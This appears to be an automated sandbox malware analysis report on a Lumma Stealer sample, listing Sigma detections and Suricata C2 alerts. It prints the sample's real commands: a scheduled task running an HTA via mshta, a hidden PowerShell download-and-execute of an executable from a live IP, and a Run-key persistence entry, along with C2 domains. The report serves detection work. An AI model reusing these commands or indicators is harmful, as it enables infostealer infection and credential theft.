Author: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\system32\cmd.exe /c schtasks /create /tn pE6zJmaLr3c /tr "mshta C:\Users\user\AppData\Local\Temp\0uDicgVYv.hta" /sc minute /mo 25 /ru "user" /f, CommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn pE6zJmaLr3c /tr "mshta C:\Users\user\AppData\Local\Temp\0uDicgVYv.hta" /sc minute /mo 25 /ru "user" /f, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\10060350101\977b4d66ef.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\10060350101\977b4d66ef.exe, ParentProcessId: 3792, ParentProcessName: 977b4d66ef.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn pE6zJmaLr3c /tr "mshta C:\Users\user\AppData\Local\Temp\0uDicgVYv.hta" /sc minute /mo 25 /ru "user" /f, ProcessId: 3564, ProcessName: cmd.exe

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Source: Process started

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe, ProcessId: 1416, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\186adf2617.exe

Sigma detected: PowerShell DownloadFile

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'NLDQJWO4P0JKZKGQIFPHKJAJP3FG2MC9.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'NLDQJWO4P0JKZKGQIFPHKJAJP3FG2MC9.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\0uDicgVYv.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7024, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'NLDQJWO4P0JKZKGQIFPHKJAJP3FG2MC9.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 4568, ProcessName: powershell.exe

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: mshta C:\Users\user\AppData\Local\Temp\0uDicgVYv.hta, CommandLine: mshta C:\Users\user\AppData\Local\Temp\0uDicgVYv.hta, CommandLine|base64offset|contains: m, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\10060350101\977b4d66ef.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\10060350101\977b4d66ef.exe, ParentProcessId: 3792, ParentProcessName: 977b4d66ef.exe, ProcessCommandLine: mshta C:\Users\user\AppData\Local\Temp\0uDicgVYv.hta, ProcessId: 7024, ProcessName: mshta.exe

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'NLDQJWO4P0JKZKGQIFPHKJAJP3FG2MC9.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'NLDQJWO4P0JKZKGQIFPHKJAJP3FG2MC9.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\0uDicgVYv.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7024, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'NLDQJWO4P0JKZKGQIFPHKJAJP3FG2MC9.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 4568, ProcessName: powershell.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: mshta C:\Users\user\AppData\Local\Temp\0uDicgVYv.hta, CommandLine: mshta C:\Users\user\AppData\Local\Temp\0uDicgVYv.hta, CommandLine|base64offset|contains: m, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\10060350101\977b4d66ef.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\10060350101\977b4d66ef.exe, ParentProcessId: 3792, ParentProcessName: 977b4d66ef.exe, ProcessCommandLine: mshta C:\Users\user\AppData\Local\Temp\0uDicgVYv.hta, ProcessId: 7024, ProcessName: mshta.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe, ProcessId: 1416, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\186adf2617.exe

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4568, TargetFilename: C:\Users\user\AppData\Local\TempNLDQJWO4P0JKZKGQIFPHKJAJP3FG2MC9.EXE

Sigma detected: PowerShell Download Pattern

Source: Process started

Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'NLDQJWO4P0JKZKGQIFPHKJAJP3FG2MC9.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'NLDQJWO4P0JKZKGQIFPHKJAJP3FG2MC9.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\0uDicgVYv.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7024, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'NLDQJWO4P0JKZKGQIFPHKJAJP3FG2MC9.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 4568, ProcessName: powershell.exe

Sigma detected: PowerShell Web Download

Source: Process started

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: schtasks /create /tn pE6zJmaLr3c /tr "mshta C:\Users\user\AppData\Local\Temp\0uDicgVYv.hta" /sc minute /mo 25 /ru "user" /f, CommandLine: schtasks /create /tn pE6zJmaLr3c /tr "mshta C:\Users\user\AppData\Local\Temp\0uDicgVYv.hta" /sc minute /mo 25 /ru "user" /f, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn pE6zJmaLr3c /tr "mshta C:\Users\user\AppData\Local\Temp\0uDicgVYv.hta" /sc minute /mo 25 /ru "user" /f, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3564, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn pE6zJmaLr3c /tr "mshta C:\Users\user\AppData\Local\Temp\0uDicgVYv.hta" /sc minute /mo 25 /ru "user" /f, ProcessId: 6720, ProcessName: schtasks.exe

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'NLDQJWO4P0JKZKGQIFPHKJAJP3FG2MC9.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'NLDQJWO4P0JKZKGQIFPHKJAJP3FG2MC9.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\0uDicgVYv.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7024, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'NLDQJWO4P0JKZKGQIFPHKJAJP3FG2MC9.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 4568, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'NLDQJWO4P0JKZKGQIFPHKJAJP3FG2MC9.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'NLDQJWO4P0JKZKGQIFPHKJAJP3FG2MC9.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\0uDicgVYv.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7024, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'NLDQJWO4P0JKZKGQIFPHKJAJP3FG2MC9.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 4568, ProcessName: powershell.exe

Data Obfuscation

Sigma detected: Powershell download and execute file

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'NLDQJWO4P0JKZKGQIFPHKJAJP3FG2MC9.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'NLDQJWO4P0JKZKGQIFPHKJAJP3FG2MC9.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\0uDicgVYv.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7024, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'NLDQJWO4P0JKZKGQIFPHKJAJP3FG2MC9.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 4568, ProcessName: powershell.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-01T16:26:32.799385+0100	2028371	3	Unknown Traffic	192.168.2.6	49736	104.21.96.1	443	TCP
2025-03-01T16:26:33.745647+0100	2028371	3	Unknown Traffic	192.168.2.6	49743	104.21.96.1	443	TCP
2025-03-01T16:26:34.575835+0100	2028371	3	Unknown Traffic	192.168.2.6	49750	104.21.96.1	443	TCP
2025-03-01T16:26:35.340292+0100	2028371	3	Unknown Traffic	192.168.2.6	49757	104.21.96.1	443	TCP
2025-03-01T16:26:35.942989+0100	2028371	3	Unknown Traffic	192.168.2.6	49761	104.21.96.1	443	TCP
2025-03-01T16:26:41.652546+0100	2028371	3	Unknown Traffic	192.168.2.6	49801	23.67.133.187	443	TCP
2025-03-01T16:26:42.804153+0100	2028371	3	Unknown Traffic	192.168.2.6	49812	188.114.97.3	443	TCP
2025-03-01T16:26:43.466284+0100	2028371	3	Unknown Traffic	192.168.2.6	49817	188.114.97.3	443	TCP
2025-03-01T16:26:45.094792+0100	2028371	3	Unknown Traffic	192.168.2.6	49830	188.114.97.3	443	TCP
2025-03-01T16:26:46.906160+0100	2028371	3	Unknown Traffic	192.168.2.6	49842	188.114.97.3	443	TCP
2025-03-01T16:26:48.161721+0100	2028371	3	Unknown Traffic	192.168.2.6	49852	172.67.200.156	443	TCP
2025-03-01T16:26:48.479268+0100	2028371	3	Unknown Traffic	192.168.2.6	49856	188.114.97.3	443	TCP
2025-03-01T16:26:48.838419+0100	2028371	3	Unknown Traffic	192.168.2.6	49859	172.67.200.156	443	TCP
2025-03-01T16:26:50.486986+0100	2028371	3	Unknown Traffic	192.168.2.6	49871	188.114.97.3	443	TCP
2025-03-01T16:26:52.049037+0100	2028371	3	Unknown Traffic	192.168.2.6	49883	188.114.97.3	443	TCP
2025-03-01T16:26:54.119096+0100	2028371	3	Unknown Traffic	192.168.2.6	49899	188.114.97.3	443	TCP
2025-03-01T16:26:56.503086+0100	2028371	3	Unknown Traffic	192.168.2.6	49912	172.67.200.156	443	TCP
2025-03-01T16:26:57.996144+0100	2028371	3	Unknown Traffic	192.168.2.6	49923	172.67.200.156	443	TCP
2025-03-01T16:26:59.442789+0100	2028371	3	Unknown Traffic	192.168.2.6	49932	172.67.200.156	443	TCP
2025-03-01T16:27:01.551392+0100	2028371	3	Unknown Traffic	192.168.2.6	49949	172.67.200.156	443	TCP
2025-03-01T16:27:02.946688+0100	2028371	3	Unknown Traffic	192.168.2.6	49957	172.67.200.156	443	TCP
2025-03-01T16:27:09.885256+0100	2028371	3	Unknown Traffic	192.168.2.6	49999	172.67.200.156	443	TCP
2025-03-01T16:27:15.648607+0100	2028371	3	Unknown Traffic	192.168.2.6	50024	188.114.97.3	443	TCP
2025-03-01T16:27:16.268702+0100	2028371	3	Unknown Traffic	192.168.2.6	50026	188.114.97.3	443	TCP
2025-03-01T16:27:18.086316+0100	2028371	3	Unknown Traffic	192.168.2.6	50028	188.114.97.3	443	TCP
2025-03-01T16:27:19.629252+0100	2028371	3	Unknown Traffic	192.168.2.6	50029	188.114.97.3	443	TCP
2025-03-01T16:27:22.198191+0100	2028371	3	Unknown Traffic	192.168.2.6	50031	188.114.97.3	443	TCP
2025-03-01T16:27:24.169851+0100	2028371	3	Unknown Traffic	192.168.2.6	50034	188.114.97.3	443	TCP
2025-03-01T16:27:27.797754+0100	2028371	3	Unknown Traffic	192.168.2.6	50036	188.114.97.3	443	TCP
2025-03-01T16:27:28.474829+0100	2028371	3	Unknown Traffic	192.168.2.6	50037	188.114.97.3	443	TCP
2025-03-01T16:27:29.841741+0100	2028371	3	Unknown Traffic	192.168.2.6	50039	188.114.97.3	443	TCP
2025-03-01T16:27:31.888304+0100	2028371	3	Unknown Traffic	192.168.2.6	50041	188.114.97.3	443	TCP
2025-03-01T16:27:32.258313+0100	2028371	3	Unknown Traffic	192.168.2.6	50042	188.114.97.3	443	TCP
2025-03-01T16:27:35.122990+0100	2028371	3	Unknown Traffic	192.168.2.6	50048	188.114.97.3	443	TCP
2025-03-01T16:27:35.519526+0100	2028371	3	Unknown Traffic	192.168.2.6	50052	188.114.97.3	443	TCP
2025-03-01T16:27:38.387682+0100	2028371	3	Unknown Traffic	192.168.2.6	50057	188.114.97.3	443	TCP
2025-03-01T16:27:42.033788+0100	2028371	3	Unknown Traffic	192.168.2.6	50066	188.114.97.3	443	TCP
2025-03-01T16:27:43.305613+0100	2028371	3	Unknown Traffic	192.168.2.6	50068	188.114.97.3	443	TCP
2025-03-01T16:28:16.893056+0100	2028371	3	Unknown Traffic	192.168.2.6	50121	188.114.97.3	443	TCP
2025-03-01T16:28:17.504948+0100	2028371	3	Unknown Traffic	192.168.2.6	50122	188.114.97.3	443	TCP
2025-03-01T16:28:18.629329+0100	2028371	3	Unknown Traffic	192.168.2.6	50124	188.114.97.3	443	TCP
2025-03-01T16:28:19.568428+0100	2028371	3	Unknown Traffic	192.168.2.6	50125	188.114.97.3	443	TCP
2025-03-01T16:28:20.804774+0100	2028371	3	Unknown Traffic	192.168.2.6	50128	188.114.97.3	443	TCP
2025-03-01T16:28:21.922042+0100	2028371	3	Unknown Traffic	192.168.2.6	50130	188.114.97.3	443	TCP
2025-03-01T16:28:23.444599+0100	2028371	3	Unknown Traffic	192.168.2.6	50132	188.114.97.3	443	TCP
2025-03-01T16:28:25.011440+0100	2028371	3	Unknown Traffic	192.168.2.6	50133	188.114.97.3	443	TCP
2025-03-01T16:28:56.729113+0100	2028371	3	Unknown Traffic	192.168.2.6	50186	104.21.96.1	443	TCP
2025-03-01T16:28:57.329293+0100	2028371	3	Unknown Traffic	192.168.2.6	50188	104.21.96.1	443	TCP
2025-03-01T16:28:58.502628+0100	2028371	3	Unknown Traffic	192.168.2.6	50189	104.21.96.1	443	TCP
2025-03-01T16:28:59.296192+0100	2028371	3	Unknown Traffic	192.168.2.6	50191	104.21.96.1	443	TCP
2025-03-01T16:28:59.880824+0100	2028371	3	Unknown Traffic	192.168.2.6	50192	104.21.96.1	443	TCP
2025-03-01T16:29:30.445473+0100	2028371	3	Unknown Traffic	192.168.2.6	50221	23.197.127.21	443	TCP
2025-03-01T16:29:31.560920+0100	2028371	3	Unknown Traffic	192.168.2.6	50223	188.114.97.3	443	TCP
2025-03-01T16:29:32.154706+0100	2028371	3	Unknown Traffic	192.168.2.6	50224	188.114.97.3	443	TCP
2025-03-01T16:29:33.617114+0100	2028371	3	Unknown Traffic	192.168.2.6	50225	188.114.97.3	443	TCP
2025-03-01T16:29:35.104974+0100	2028371	3	Unknown Traffic	192.168.2.6	50227	172.67.200.156	443	TCP
2025-03-01T16:29:35.710931+0100	2028371	3	Unknown Traffic	192.168.2.6	50228	172.67.200.156	443	TCP
2025-03-01T16:29:46.276547+0100	2028371	3	Unknown Traffic	192.168.2.6	50242	188.114.97.3	443	TCP
2025-03-01T16:29:47.456433+0100	2028371	3	Unknown Traffic	192.168.2.6	50243	188.114.97.3	443	TCP
2025-03-01T16:29:48.690942+0100	2028371	3	Unknown Traffic	192.168.2.6	50246	172.67.200.156	443	TCP
2025-03-01T16:29:48.703173+0100	2028371	3	Unknown Traffic	192.168.2.6	50245	188.114.97.3	443	TCP
2025-03-01T16:29:50.247043+0100	2028371	3	Unknown Traffic	192.168.2.6	50247	172.67.200.156	443	TCP
2025-03-01T16:29:50.380441+0100	2028371	3	Unknown Traffic	192.168.2.6	50249	188.114.97.3	443	TCP
2025-03-01T16:29:51.314123+0100	2028371	3	Unknown Traffic	192.168.2.6	50250	188.114.97.3	443	TCP
2025-03-01T16:29:53.498388+0100	2028371	3	Unknown Traffic	192.168.2.6	50252	172.67.200.156	443	TCP
2025-03-01T16:29:54.660791+0100	2028371	3	Unknown Traffic	192.168.2.6	50254	172.67.200.156	443	TCP
2025-03-01T16:29:55.751958+0100	2028371	3	Unknown Traffic	192.168.2.6	50257	172.67.200.156	443	TCP
2025-03-01T16:29:56.840416+0100	2028371	3	Unknown Traffic	192.168.2.6	50258	172.67.200.156	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-01T16:26:33.155095+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49736	104.21.96.1	443	TCP
2025-03-01T16:26:33.890649+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49743	104.21.96.1	443	TCP
2025-03-01T16:26:36.084758+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49761	104.21.96.1	443	TCP
2025-03-01T16:26:42.966033+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49812	188.114.97.3	443	TCP
2025-03-01T16:26:43.936349+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49817	188.114.97.3	443	TCP
2025-03-01T16:26:48.339597+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49852	172.67.200.156	443	TCP
2025-03-01T16:26:54.560676+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49899	188.114.97.3	443	TCP
2025-03-01T16:26:55.554304+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49859	172.67.200.156	443	TCP
2025-03-01T16:27:13.446081+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49999	172.67.200.156	443	TCP
2025-03-01T16:27:15.807077+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50024	188.114.97.3	443	TCP
2025-03-01T16:27:16.764213+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50026	188.114.97.3	443	TCP
2025-03-01T16:27:27.999268+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50036	188.114.97.3	443	TCP
2025-03-01T16:27:28.953202+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50037	188.114.97.3	443	TCP
2025-03-01T16:27:35.966534+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50052	188.114.97.3	443	TCP
2025-03-01T16:28:17.029920+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50121	188.114.97.3	443	TCP
2025-03-01T16:28:18.012965+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50122	188.114.97.3	443	TCP
2025-03-01T16:28:25.493604+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50133	188.114.97.3	443	TCP
2025-03-01T16:28:56.859652+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50186	104.21.96.1	443	TCP
2025-03-01T16:28:57.454748+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50188	104.21.96.1	443	TCP
2025-03-01T16:29:00.022799+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50192	104.21.96.1	443	TCP
2025-03-01T16:29:31.682143+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50223	188.114.97.3	443	TCP
2025-03-01T16:29:32.594641+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50224	188.114.97.3	443	TCP
2025-03-01T16:29:35.236385+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50227	172.67.200.156	443	TCP
2025-03-01T16:29:36.235242+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50228	172.67.200.156	443	TCP
2025-03-01T16:29:51.666406+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50250	188.114.97.3	443	TCP
2025-03-01T16:29:57.311922+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50258	172.67.200.156	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-01T16:26:33.155095+0100	2049836	1	A Network Trojan was detected	192.168.2.6	49736	104.21.96.1	443	TCP
2025-03-01T16:26:42.966033+0100	2049836	1	A Network Trojan was detected	192.168.2.6	49812	188.114.97.3	443	TCP
2025-03-01T16:26:48.339597+0100	2049836	1	A Network Trojan was detected	192.168.2.6	49852	172.67.200.156	443	TCP
2025-03-01T16:27:15.807077+0100	2049836	1	A Network Trojan was detected	192.168.2.6	50024	188.114.97.3	443	TCP
2025-03-01T16:27:27.999268+0100	2049836	1	A Network Trojan was detected	192.168.2.6	50036	188.114.97.3	443	TCP
2025-03-01T16:28:17.029920+0100	2049836	1	A Network Trojan was detected	192.168.2.6	50121	188.114.97.3	443	TCP
2025-03-01T16:28:56.859652+0100	2049836	1	A Network Trojan was detected	192.168.2.6	50186	104.21.96.1	443	TCP
2025-03-01T16:29:31.682143+0100	2049836	1	A Network Trojan was detected	192.168.2.6	50223	188.114.97.3	443	TCP
2025-03-01T16:29:35.236385+0100	2049836	1	A Network Trojan was detected	192.168.2.6	50227	172.67.200.156	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (exarthynature .run in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-01T16:26:32.799385+0100	2060386	1	Domain Observed Used for C2 Detected	192.168.2.6	49736	104.21.96.1	443	TCP
2025-03-01T16:26:33.745647+0100	2060386	1	Domain Observed Used for C2 Detected	192.168.2.6	49743	104.21.96.1	443	TCP
2025-03-01T16:26:34.575835+0100	2060386	1	Domain Observed Used for C2 Detected	192.168.2.6	49750	104.21.96.1	443	TCP
2025-03-01T16:26:35.340292+0100	2060386	1	Domain Observed Used for C2 Detected	192.168.2.6	49757	104.21.96.1	443	TCP
2025-03-01T16:26:35.942989+0100	2060386	1	Domain Observed Used for C2 Detected	192.168.2.6	49761	104.21.96.1	443	TCP
2025-03-01T16:28:56.729113+0100	2060386	1	Domain Observed Used for C2 Detected	192.168.2.6	50186	104.21.96.1	443	TCP
2025-03-01T16:28:57.329293+0100	2060386	1	Domain Observed Used for C2 Detected	192.168.2.6	50188	104.21.96.1	443	TCP
2025-03-01T16:28:58.502628+0100	2060386	1	Domain Observed Used for C2 Detected	192.168.2.6	50189	104.21.96.1	443	TCP
2025-03-01T16:28:59.296192+0100	2060386	1	Domain Observed Used for C2 Detected	192.168.2.6	50191	104.21.96.1	443	TCP
2025-03-01T16:28:59.880824+0100	2060386	1	Domain Observed Used for C2 Detected	192.168.2.6	50192	104.21.96.1	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deaddereaste .today)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-01T16:26:40.919646+0100	2060330	1	Domain Observed Used for C2 Detected	192.168.2.6	53728	1.1.1.1	53	UDP
2025-03-01T16:29:29.579675+0100	2060330	1	Domain Observed Used for C2 Detected	192.168.2.6	54174	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (decreaserid .world)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-01T16:26:40.864446+0100	2060202	1	Domain Observed Used for C2 Detected	192.168.2.6	57049	1.1.1.1	53	UDP
2025-03-01T16:29:29.524957+0100	2060202	1	Domain Observed Used for C2 Detected	192.168.2.6	56534	1.1.1.1	53	UDP

